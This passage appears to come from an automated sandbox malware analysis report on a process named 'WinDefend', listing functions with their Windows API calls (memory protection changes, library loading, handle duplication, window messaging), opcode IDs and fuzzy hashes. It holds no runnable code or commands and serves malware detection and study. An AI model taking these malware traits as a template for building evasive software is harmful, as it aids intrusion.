Instruction Fuzzy Hash: C9E1F674E11219CFDBA4CF65D9847DEBBB2FB89310F1091AAE809B7254DB715A80CF50

Function 062C17B8 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a4dd38e3c54d0ea90d0f0700f223b4a54197bcc376935d2ed5f478b0bf4cb2
Instruction ID: 7fc697bc7211ea521508900d55fd84ab2af98301f1c10134b51ebd169d83a19e
Opcode Fuzzy Hash: 04a4dd38e3c54d0ea90d0f0700f223b4a54197bcc376935d2ed5f478b0bf4cb2
Instruction Fuzzy Hash: B5717C70E25218CFDB48CFA5D549ADDFBF2EB89360F20A12AD90AB7254D7309911CF54

Function 062C17A8 Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17f0e032dd12424790532e1bad9b18dd5af1f1b108393e7b5296b44fb2b82293
Instruction ID: 3ddbf24cf76e2eddbd5da17bf31938b9a7e59a1ae67939ea5a03be174074f9bb
Opcode Fuzzy Hash: 17f0e032dd12424790532e1bad9b18dd5af1f1b108393e7b5296b44fb2b82293
Instruction Fuzzy Hash: FA717D70E25218CFDB48CFA5D549ADDFBF2EB89350F24A12AD40AB7254DB309911CF54

Function 05447780 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0544780E
GetCurrentThread.KERNEL32 ref: 0544784B
GetCurrentProcess.KERNEL32 ref: 05447888
GetCurrentThreadId.KERNEL32 ref: 054478E1

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: db4898053a3d81231b7bfc823d9f80abd1c61905273f1eaae47606c3907a2c51
Instruction ID: 2d6559b545cfe2ac3df9b6a6f579c1f83cbf47a03d235db7edb6192db622eb33
Opcode Fuzzy Hash: db4898053a3d81231b7bfc823d9f80abd1c61905273f1eaae47606c3907a2c51
Instruction Fuzzy Hash: B3515AB09002498FEB58DFA9D548BDEBBF1FF88304F20845AE409A73A1D7786845CF65

Function 05447790 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0544780E
GetCurrentThread.KERNEL32 ref: 0544784B
GetCurrentProcess.KERNEL32 ref: 05447888
GetCurrentThreadId.KERNEL32 ref: 054478E1

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 94d4398fd115a8bc394317dcadc5dd32c1cbee91a8e7e0f3acabd15ac619828f
Instruction ID: 35157416b8206c8353973d7e20688537bc1bdd5b8c02218ac7813d278334b2f0
Opcode Fuzzy Hash: 94d4398fd115a8bc394317dcadc5dd32c1cbee91a8e7e0f3acabd15ac619828f
Instruction Fuzzy Hash: EF5159B09002498FEB18DFAAD548BDEBBF1FF88304F20845AE409A7361D7786845CF65

Function 062C0448 Relevance: 5.2, Strings: 4, Instructions: 197
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 062C0692
xaq, xrefs: 062C057B
xaq, xrefs: 062C05D7
(aq, xrefs: 062C06BE

Memory Dump Source

Source File: 00000016.00000002.3462770615.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_62c0000_WinDefend.jbxd

Similarity

API ID:
String ID: (aq$(aq$xaq$xaq
API String ID: 0-3564754046
Opcode ID: 6160e107c1347370a9c90457f26a269b6a13493a9cc8e2775c00f25412bc6f7c
Instruction ID: 99982893ce3007d2dbb16e1da05db223e630cfce940ca0ee2a98cb8660178efc
Opcode Fuzzy Hash: 6160e107c1347370a9c90457f26a269b6a13493a9cc8e2775c00f25412bc6f7c
Instruction Fuzzy Hash: B361A0307002069FDB599F69D850BAE77A2FF84314F14856DE90A9B3A5CF76EC42CB90

Function 0544DC08 Relevance: 2.0, APIs: 1, Instructions: 508COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5c13f255a6ccb96d784c44640da13e1c92ef734cca1b22771523cefa878258
Instruction ID: 57b081ec382ea6c541a39db9871ec9e581fa55bca8d3793a88fad38eb3a25e6f
Opcode Fuzzy Hash: 6f5c13f255a6ccb96d784c44640da13e1c92ef734cca1b22771523cefa878258
Instruction Fuzzy Hash: AF222D74E84205CFEB14DF98C5899FEBBB6BB84310F648197D81297395C7389852CF92

Function 054453B0 Relevance: 1.7, APIs: 1, Instructions: 224COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05445632

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 294d7da5582e38873d5d25bfcc6aca93f61f0aeed909229112a085e89fb2f527
Instruction ID: b7764fbe7585acee3b0367a40746e02da3153384b108b68569e3f29a013b89b3
Opcode Fuzzy Hash: 294d7da5582e38873d5d25bfcc6aca93f61f0aeed909229112a085e89fb2f527
Instruction Fuzzy Hash: DB9114B0A007459FEB24CF6AD544B9ABBF2BF48300F10896AE44AE7750D734E945CF94

Function 0544C0C5 Relevance: 1.7, APIs: 1, Instructions: 183COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0544C291

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 32a8ab53af92c03b6b29a30ae569efe88dd6e923f1c9b48b664478b102ee49f6
Instruction ID: f834bfcd9f6c3ea83c7780a5ad09f8b916646d2780f22615a06b881c5f3d61a9
Opcode Fuzzy Hash: 32a8ab53af92c03b6b29a30ae569efe88dd6e923f1c9b48b664478b102ee49f6
Instruction Fuzzy Hash: 2F718BB4D01218DFDF20CFA9D984BDEBBB1BF09300F2491AAE418A7211D775AA85CF55

Function 0544C0D0 Relevance: 1.7, APIs: 1, Instructions: 182COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0544C291

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: e5c31f3346c0c7cc38ed5dae591c90e0139c08e8ed3aeb671e4a082206dc3f8a
Instruction ID: 39307660d301af595b61da31f842ac2da44b379d33b1bb80aad519d05e17e15f
Opcode Fuzzy Hash: e5c31f3346c0c7cc38ed5dae591c90e0139c08e8ed3aeb671e4a082206dc3f8a
Instruction Fuzzy Hash: 64719BB4D01218DFDF20CFA9D984BDEBBB1BF09300F1491AAE408A7211D774AA85CF55

Function 01522571 Relevance: 1.7, APIs: 1, Instructions: 168memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 015226DF

Memory Dump Source

Source File: 00000016.00000002.3282679841.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1520000_WinDefend.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9db2e4e81b396dddaa5f076473617b9744597f17cec399bd0b92d49eea9fd44e
Instruction ID: fe0abdb5e633b46dd063366cd4a31e7a3b110d04dedf05a9834ce2bb6219d22f
Opcode Fuzzy Hash: 9db2e4e81b396dddaa5f076473617b9744597f17cec399bd0b92d49eea9fd44e
Instruction Fuzzy Hash: 675148B5C443189FCB10CFA4D8809DEFBB1FF4A720F15826EE404AB601C3399945CBA4

Function 0152CF9C Relevance: 1.6, APIs: 1, Instructions: 126COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 0152E849

Memory Dump Source

Source File: 00000016.00000002.3282679841.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1520000_WinDefend.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3b218e2ccb5dc799e7f582df798e714f1170a7c3d0c82b8a77abdb2e0f1eb8bb
Instruction ID: c7a2db93948f1c9fc85d05b3fee5db1ee1848ce9c442a5853c1af851adcd1916
Opcode Fuzzy Hash: 3b218e2ccb5dc799e7f582df798e714f1170a7c3d0c82b8a77abdb2e0f1eb8bb
Instruction Fuzzy Hash: 2851D671D00219CFDB20DFA9C940BDEBBF5BF4A300F1084AAD549AB251DB756A45CF91

Function 05DD6440 Relevance: 1.6, APIs: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05DD6533

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 93d52d9d3e604582ca7a50a9516651a0ba2fdc112be408db130ad22fa6ef30dc
Instruction ID: 75dd0c17e9e3fdc111cd7a878f69195ba9fb22d06a43fa066139aed7b413bd80
Opcode Fuzzy Hash: 93d52d9d3e604582ca7a50a9516651a0ba2fdc112be408db130ad22fa6ef30dc
Instruction Fuzzy Hash: AC41DFB5E042189FCB14CFA9D884A9EFBF5FF49310F14906AE819A7320D735A945CFA4

Function 054479D2 Relevance: 1.6, APIs: 1, Instructions: 109COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05447AA3

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: eeb6ce900828d48452b0c76d10ed1b732ba4c3db9f18305ccccd90bd3ce8d2ed
Instruction ID: 2141ebfe3a6fdebe64f2cd3bd134ec673140aed285b9a4fa5e5b7a1d04a9dd49
Opcode Fuzzy Hash: eeb6ce900828d48452b0c76d10ed1b732ba4c3db9f18305ccccd90bd3ce8d2ed
Instruction Fuzzy Hash: 0B4146B9D002589FDB10CFAAD984ADEBBF5FB09310F14906AE918BB310D335AA45CF54

Function 054479D8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05447AA3

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7cdb0270bcddaa0b89cdd08eae1e6303bb367272c77249036fe3baca87403573
Instruction ID: 621e4c4b99a60e5c19ba14a66d1a49b45ef51272b1c8bdb185a0a0f36bbe85cd
Opcode Fuzzy Hash: 7cdb0270bcddaa0b89cdd08eae1e6303bb367272c77249036fe3baca87403573
Instruction Fuzzy Hash: AD4146B9D002589FDB10CFAAD984ADEBBF5BB09310F14906AE918BB310D335A945CF54

Function 05444DE0 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0544595A

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 735e1201046286ab569ce99be5723d1353fd1a98b06edcd474ee1858ae7ad992
Instruction ID: 5d0aff8baf6962274a8fc846723de1b85f3722fd656656245d2f1344756863c3
Opcode Fuzzy Hash: 735e1201046286ab569ce99be5723d1353fd1a98b06edcd474ee1858ae7ad992
Instruction Fuzzy Hash: F84185B4D002589FDB10CFAAD484AEEFBF5BB09310F14906AE818B7320D334A945CF98

Function 0544AF54 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 0544E901

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: e9d95f65830b941cc08e1fa750b136f5e7ed07d3eec30a8bc7fb71940849db34
Instruction ID: a3f4ce69fdc598dd79b65efa8b8eb65cbe0e71283c9253265f99f468a5a1d3fc
Opcode Fuzzy Hash: e9d95f65830b941cc08e1fa750b136f5e7ed07d3eec30a8bc7fb71940849db34
Instruction Fuzzy Hash: 70414BB4900209DFDB14DF99C448AAAFBF9FF88314F24C499E519A7361D774A841CFA1

Function 054458A8 Relevance: 1.6, APIs: 1, Instructions: 97libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(?,?,?), ref: 0544595A

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9c1532a65905da40b2627087d097cae0915fe5eaae04259c5db8be21dd9a517a
Instruction ID: 7ff9eb56fa2137be950a85edf5d8e2b7f116bda52d6544b068057e0324089875
Opcode Fuzzy Hash: 9c1532a65905da40b2627087d097cae0915fe5eaae04259c5db8be21dd9a517a
Instruction Fuzzy Hash: 0E4196B8D002589FDB10CFAAD884ADEFBF1BB49310F14902AE818B7320D334A945CF94

Function 01522638 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 015226DF

Memory Dump Source

Source File: 00000016.00000002.3282679841.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1520000_WinDefend.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ce38e5c399f8f9a53aaac2de21b49490d004cdd35d45cfb177f6cf8f83793177
Instruction ID: 8654d814146232a8ef028d7b8482a7af8e94b2c4cf16395117b2aef0b4b471fc
Opcode Fuzzy Hash: ce38e5c399f8f9a53aaac2de21b49490d004cdd35d45cfb177f6cf8f83793177
Instruction Fuzzy Hash: B33199B9D042589FCB10CFA9D484ADEFBF1BB19310F24902AE814B7250D775A945CF64

Function 05DDA8B8 Relevance: 1.6, APIs: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DDA95B

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: a69e55b0ed240c8b6b2b64f3020c47137870cb1e3d2ff6f417bacf9bbe7de6bf
Instruction ID: 5284aecbe6d615e16d8a4464d07f93d653aec862671da5d5f08e6e9487682bf2
Opcode Fuzzy Hash: a69e55b0ed240c8b6b2b64f3020c47137870cb1e3d2ff6f417bacf9bbe7de6bf
Instruction Fuzzy Hash: 903177B9D04258EFCB10CFAAD584A9EFBF5BB09310F14902AE858B7210D739A945CF65

Function 05DD6491 Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,?,?), ref: 05DD6533

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 92abe23016c581b593683605ce4fee47a0760d201bc02ea11e07f2bb6698b580
Instruction ID: 799b625cb2fe5601ca6709ddbf91fd83dafe8f52b80c3158c9b9bf19c2b15eac
Opcode Fuzzy Hash: 92abe23016c581b593683605ce4fee47a0760d201bc02ea11e07f2bb6698b580
Instruction Fuzzy Hash: B53168B9D04258AFCB10CFA9E584A9EFBF5EB49310F24901AE818B7314D335A945CFA4

Function 05DD1E0C Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,?), ref: 05DD5CB3

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 181fadab48efb897706ec94899bc849649c386a49ba50194110e4fc828b08704
Instruction ID: 1d98af47c5d3e16f5bc931d220c8a4b807c1042a15b83e66c282ff962265381c
Opcode Fuzzy Hash: 181fadab48efb897706ec94899bc849649c386a49ba50194110e4fc828b08704
Instruction Fuzzy Hash: FF3199B8D052189FCB10CF99E584A9EFBF5BB49310F10901AE814B7310D335A945CFA4

Function 05DD5C12 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,?), ref: 05DD5CB3

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 10667042573b6c04f31eb0d376eac4f2e58b28d25cd7707396dfa4a5ca21a7b8
Instruction ID: 4ffc33b3ef385e0ba90bbc3cb985291a23dc4e41e58552315be400226cbbdd9d
Opcode Fuzzy Hash: 10667042573b6c04f31eb0d376eac4f2e58b28d25cd7707396dfa4a5ca21a7b8
Instruction Fuzzy Hash: A63168B9D01258AFCB10CF99E984A9EFBF5BB59310F24901AE819B7310D335A945CF64

Function 05DDA8C0 Relevance: 1.6, APIs: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 05DDA95B

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2703fb9152cc07dac8e766010460237bb624a14fdc77c624994f267e62a05f32
Instruction ID: ce13df14fcf4721c369616d74da477478250c8034a0e332df35c14d02651e60c
Opcode Fuzzy Hash: 2703fb9152cc07dac8e766010460237bb624a14fdc77c624994f267e62a05f32
Instruction Fuzzy Hash: 693188B9D04258EFCB10CFA9D584ADEFBF5AB09310F14901AE818B7310D339A945CF64

Function 05DD42A8 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05DD434E

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 3acf5796300639c3a5bfab22f5c2ac9449cc1edb72b89bcc8bd9198fe41d39f0
Instruction ID: 29d9e37e18d6c1e4213cb384bd03524e41b8276c6fc019fa29a4ff5cdf9c145f
Opcode Fuzzy Hash: 3acf5796300639c3a5bfab22f5c2ac9449cc1edb72b89bcc8bd9198fe41d39f0
Instruction Fuzzy Hash: 9131AAB5D012199FCB10CFA9D984AEDFBF5BB49310F14906AE858B7210D378AA45CB64

Function 05DD42B0 Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,?), ref: 05DD434E

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 9a30b2204c86fe57f06b0de0e3b00033bf3dd7f8b28858462f0aaa4c55ba62e9
Instruction ID: abe48b2c8a52ba4f926a62bc033f87946cfbef480a5693ea63e8eb612b978748
Opcode Fuzzy Hash: 9a30b2204c86fe57f06b0de0e3b00033bf3dd7f8b28858462f0aaa4c55ba62e9
Instruction Fuzzy Hash: 3831BBB4C012199FCB10CF9AD884ADEFBF5BB49310F14806AE858B7310D374AA45CBA4

Function 0544559A Relevance: 1.6, APIs: 1, Instructions: 77COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05445632

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 387916ce9ca3a3944d66f75e109adbba27b740dc1c8438e983836f465b83afb3
Instruction ID: 01be8fd806c8906ead608870dc9a4e27c936b2d4158597e313112982a0f92e60
Opcode Fuzzy Hash: 387916ce9ca3a3944d66f75e109adbba27b740dc1c8438e983836f465b83afb3
Instruction Fuzzy Hash: 213199B4D002599FCF14CFAAD584ADEFBF5AB49314F14906AE818B7320D334A945CFA4

Function 054455A0 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 05445632

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ede118fbd880d98463f521653ea44a0bd0e462dd14f02b0726ed25014eedf260
Instruction ID: 23bf62ce8ee09d8b884d161574cc27245edb302bfea431b0bee6c32002cbb94f
Opcode Fuzzy Hash: ede118fbd880d98463f521653ea44a0bd0e462dd14f02b0726ed25014eedf260
Instruction Fuzzy Hash: 333197B4D002599FCF14CFAAD584ADEFBF5AB49310F14906AE818B7320D334A945CFA4

Function 0544C3F0 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0544C486

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: da809d4a25a86b1523d720404eaaa712009fa83fd167ac9b742489d67da49e69
Instruction ID: 2c3b7f6913e13dbb614c15fbdab6d8077827b42d5132ce9870ec0a269999c5f5
Opcode Fuzzy Hash: da809d4a25a86b1523d720404eaaa712009fa83fd167ac9b742489d67da49e69
Instruction Fuzzy Hash: 5A3176B9D01218AFCB10CFA9D984ADEBBF5BB09310F14906AE818B7310D375A945CFA4

Function 0544C3F8 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0544C486

Memory Dump Source

Source File: 00000016.00000002.3414704739.0000000005440000.00000040.00000800.00020000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5440000_WinDefend.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 5ea378e41ef61a3f9a356a968da1f2f9cd661c8034274106f43c4458d1c0994c
Instruction ID: fe3c036056998c6606153fd1bbb6fb92b0d0bfd344a1fb4882b08bb09a10b874
Opcode Fuzzy Hash: 5ea378e41ef61a3f9a356a968da1f2f9cd661c8034274106f43c4458d1c0994c
Instruction Fuzzy Hash: C23187B9D012189FCB10CFA9D984ADEFBF5BB09310F14906AE818B7310D375A945CFA4

Function 05DDCFE8 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 05DDD065

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0991ff92ca69b8ae882efd43ab89ba30593b20b15cfbc88fa09c9facc1afebf1
Instruction ID: ae76d275ea675ebb3251109442b40d269a262596d9aee5948ab9a66b77cd2fde
Opcode Fuzzy Hash: 0991ff92ca69b8ae882efd43ab89ba30593b20b15cfbc88fa09c9facc1afebf1
Instruction Fuzzy Hash: E431A9B5D012199FCB10DFAAD884A9EFBF5BB49310F10901AE814B7310D339A941CF68

Function 05DDC8A0 Relevance: 1.6, APIs: 1, Instructions: 72comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(?), ref: 05DDD065

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9925423ebb67f86a0cbb4690a8a14f157dc8fec64a2c928a7a8c8b739c03f61c
Instruction ID: cf99025aed59654e7fb8ed191d96cf8b677dd3bb8c1f2784a6cf4838aa701f7f
Opcode Fuzzy Hash: 9925423ebb67f86a0cbb4690a8a14f157dc8fec64a2c928a7a8c8b739c03f61c
Instruction Fuzzy Hash: C531A9B4D012599FCB10DFAAD984AAEFBF5FB49310F10902AE814B7310D775A841CFA4

Function 05DDC94C Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,-00000018,?), ref: 05DDE193

Memory Dump Source

Source File: 00000016.00000002.3455748350.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_5dd0000_WinDefend.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 45f039150538bc96eba2832a825cb1f8653dead9ce269aa47a37f468ab6a4911
Instruction ID: d8795fee7b2c56f4c6ca0e2f8303d14e435703d6b752a6b792e73bb9ca54f3d0
Opcode Fuzzy Hash: 45f039150538bc96eba2832a825cb1f8653dead9ce269aa47a37f468ab6a4911
Instruction Fuzzy Hash: 0D31AEB4D052099FCB10CFAAD984ADEFBF5EB49320F24905AE818B7310D375A941CFA5

Function 05DDE110 Relevance: 1.6, APIs: 1, Instructions: 71windowCOMMON

Download Yara Rule

APIs

